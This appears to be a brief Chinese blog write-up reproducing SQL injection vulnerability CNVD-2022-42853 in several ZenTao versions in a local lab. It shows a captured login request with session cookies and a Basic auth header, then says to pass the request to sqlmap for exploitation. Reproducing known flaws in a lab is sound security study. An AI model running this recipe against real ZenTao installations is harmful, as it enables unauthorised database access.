漏洞编号
CNVD-2022-42853
禅道企业版 6.5
禅道旗舰版 3.0
禅道开源版 16.5
禅道开源版 16.5.beta1
复现过程
搭建禅道环境,点击 start
运行
访问地址,登录进行抓包
POST /zentao/user-login.html HTTP/1.1
Host: 192.168.121.133:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.121.133:82/zentao/user-login-L3plbnRhby8=.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: http://192.168.121.133:82
DNT: 1
Authorization: Basic emVudGFvOmRCRWRQVUl4VGlu
Connection: close
Cookie: zentaosid=b9b1928181cf6feba9c9ec5781c64b54; lang=zh-cn; device=desktop; theme=default; windowWidth=1664; windowHeight=810; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=f88b39d5; PHPSESSID=qii4d2oujq7jc6rhecjlq6fga1; KEY_RANDOMDATA=19059
account=admin&password=d946e9f1a52f641d4ce78ad58da857af&passwordStrength=0&referer=%2Fzentao%2F&verifyRand=57784117&keepLogin=0&captcha=
把数据包放到 sqlmap
中进行利用
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容